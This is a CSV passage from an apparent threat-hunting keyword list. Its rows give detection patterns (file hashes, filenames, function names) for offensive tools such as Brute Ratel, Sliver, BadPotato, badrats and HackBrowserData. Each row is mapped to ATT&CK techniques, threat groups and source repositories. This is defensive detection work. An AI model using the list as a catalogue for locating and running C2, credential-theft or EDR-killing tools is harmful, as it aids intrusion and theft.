"*bad29346750d2b59ec0fa45fa4eae324aae520436adcc15fffa29edfacc9be60*",".{0,1000}bad29346750d2b59ec0fa45fa4eae324aae520436adcc15fffa29edfacc9be60.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35227"
"*badb9d26cebe5c75a4d2ebf557af9496d7acc8a4b5b51f8ef2e686710bcab359*",".{0,1000}badb9d26cebe5c75a4d2ebf557af9496d7acc8a4b5b51f8ef2e686710bcab359.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35228"
"*badc29afa637d3950c1fd837122c4f5d21c2eb431f3e44fec420a9281e3fbbe1*",".{0,1000}badc29afa637d3950c1fd837122c4f5d21c2eb431f3e44fec420a9281e3fbbe1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35229"
"*badger_exports.h*",".{0,1000}badger_exports\.h.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35230"
"*badger_no_acl_1030_objects.log*",".{0,1000}badger_no_acl_1030_objects\.log.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","35231"
"*badger_svc.exe*",".{0,1000}badger_svc\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35232"
"*badger_template.ps1*",".{0,1000}badger_template\.ps1.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35233"
"*badger_x64.exe*",".{0,1000}badger_x64\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35234"
"*badger_x64_*.bin*",".{0,1000}badger_x64_.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35235"
"*badger_x64_aws.exe*",".{0,1000}badger_x64_aws\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35236"
"*badger_x64_stealth_rtl.txt*",".{0,1000}badger_x64_stealth_rtl\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","35237"
"*BadgerAtoi*",".{0,1000}BadgerAtoi.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35238"
"*BadgerDispatch*",".{0,1000}BadgerDispatch.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35239"
"*BadgerDispatchW*",".{0,1000}BadgerDispatchW.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35240"
"*BadgerMemcpy*",".{0,1000}BadgerMemcpy.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35241"
"*BadgerMemset*",".{0,1000}BadgerMemset.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35242"
"*BadgerStrcmp*",".{0,1000}BadgerStrcmp.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35243"
"*BadgerStrlen*",".{0,1000}BadgerStrlen.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35244"
"*BadgerWcscmp*",".{0,1000}BadgerWcscmp.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35245"
"*BadgerWcslen*",".{0,1000}BadgerWcslen.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35246"
"*Bad-Pdf*",".{0,1000}Bad\-Pdf.{0,1000}","offensive_tool_keyword","Bad-PDF","Bad-PDF create malicious PDF file to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines. it utilize vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.","T1566.001 - T1189 - T1068 - T1207 - T1048 - T1003","TA0001 - TA0002 - TA0003 - TA0009 - TA0010 - TA0011","N/A","N/A","Credential Access","https://github.com/deepzec/Bad-Pdf","1","1","N/A","N/A","N/A","10","1105","220","2020-08-19T06:54:51Z","2018-04-29T15:21:35Z","35247"
"*BadPotato.cs*",".{0,1000}BadPotato\.cs.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","35248"
"*BadPotato.exe*",".{0,1000}BadPotato\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","35249"
"*badpotato.exe*",".{0,1000}badpotato\.exe.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","10","","N/A","","","","35250"
"*BadPotato-master.zip*",".{0,1000}BadPotato\-master\.zip.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","35252"
"*BadRat 1.6/server_unpacked.exe*",".{0,1000}BadRat\s1\.6\/server_unpacked\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35253"
"*BadRat 1.6\server_unpacked.exe*",".{0,1000}BadRat\s1\.6\\server_unpacked\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35254"
"*badrat.smb.hta*",".{0,1000}badrat\.smb\.hta.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35255"
"*badrat.smb.js*",".{0,1000}badrat\.smb\.js.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35256"
"*badrat_cs.csproj*",".{0,1000}badrat_cs\.csproj.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35257"
"*badrat_cs.exe *",".{0,1000}badrat_cs\.exe\s.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35258"
"*badrat_cs.exe.config*",".{0,1000}badrat_cs\.exe\.config.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35259"
"*badrat_server.py *",".{0,1000}badrat_server\.py\s.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35260"
"*badrats-c2-initial-access-payloads.html*",".{0,1000}badrats\-c2\-initial\-access\-payloads\.html.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35261"
"*badrats-master.zip*",".{0,1000}badrats\-master\.zip.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","35262"
"*BadRentdrv2.exe*",".{0,1000}BadRentdrv2\.exe.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","1","N/A","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","35263"
"*BadUSB_AddAdmin.ino*",".{0,1000}BadUSB_AddAdmin\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","35264"
"*BadUSB_DownloadExecute.ino*",".{0,1000}BadUSB_DownloadExecute\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","35265"
"*BadUSB_FacebookPost.ino*",".{0,1000}BadUSB_FacebookPost\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","35266"
"*BadUSB_HideWindow.ino*",".{0,1000}BadUSB_HideWindow\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","35267"
"*BadUSB_LockYourComputer.ino*",".{0,1000}BadUSB_LockYourComputer\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","35268"
"*BadWindowsService_v1.0.7z*",".{0,1000}BadWindowsService_v1\.0\.7z.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","1","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","35269"
"*BadWindowsService_v1.0.zip*",".{0,1000}BadWindowsService_v1\.0\.zip.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","1","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","35270"
"*BadZure-main*",".{0,1000}BadZure\-main.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","1","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","35271"
"*bae4458b1ee612926f85169e02a903fb9b22d5a42f746ec210bdd02d15f7af6f*",".{0,1000}bae4458b1ee612926f85169e02a903fb9b22d5a42f746ec210bdd02d15f7af6f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35272"
"*BAE62044075CF4F76F0BAAD0FA33F6322541CC46F80C81170E97A181CAA43104*",".{0,1000}BAE62044075CF4F76F0BAAD0FA33F6322541CC46F80C81170E97A181CAA43104.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","35273"
"*baf01db350b5f61816b02ee721cbbaacec195b68b492f715d03e65383d5c7ea7*",".{0,1000}baf01db350b5f61816b02ee721cbbaacec195b68b492f715d03e65383d5c7ea7.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","35275"
"*baf6deb599ee2e6cd817dbc447bdb4ea3cf9a585708c8c585f9a104ffba2b8d9*",".{0,1000}baf6deb599ee2e6cd817dbc447bdb4ea3cf9a585708c8c585f9a104ffba2b8d9.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","#filehash","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","35279"
"*baf93de7d2d00045f677a77eeb729753c930f4d0be125a6f32db82cfe7592846*",".{0,1000}baf93de7d2d00045f677a77eeb729753c930f4d0be125a6f32db82cfe7592846.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","35280"
